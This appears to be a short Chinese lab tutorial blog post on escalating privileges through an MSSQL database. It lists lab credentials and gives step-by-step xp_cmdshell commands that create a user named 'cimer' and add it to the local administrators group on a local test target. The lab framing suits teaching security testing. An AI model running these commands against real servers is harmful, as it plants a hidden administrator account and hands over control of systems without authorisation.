Mssql数据库提权
1.1实验简介
本实验主要介绍Mssql数据库提权,通过本实验可以掌握当服务器装有Mssql数据库时如何获取服务器权限。
1.2实验环境
服务器配置:windows+iis+aspx+mssql
密码信息:administrator/roottoor sa/123123 admin
实验目标:http://127.0.0.1/edit.aspx
1.3实验步骤
mssql数据库提权
①访问http://127.0.0.1/edit.aspx
②选择数据库
③然后执行语句:exec master..xp_cmdshell 'net user cimer cimer123 /add'
④然后执行语句:exec master..xp_cmdshell 'net localgroup administrators cimer /add'
⑤然后来到cmd命令下执行语句:net user
⑥成功添加cimer用户。
Chin》原创,转载请保留文章出处。
本文链接:https://www.qinor.cn/post-23.html
版权声明:若无特殊注明,本文为《正文到此结束
发表吐槽
你肿么看?
已有1条吐槽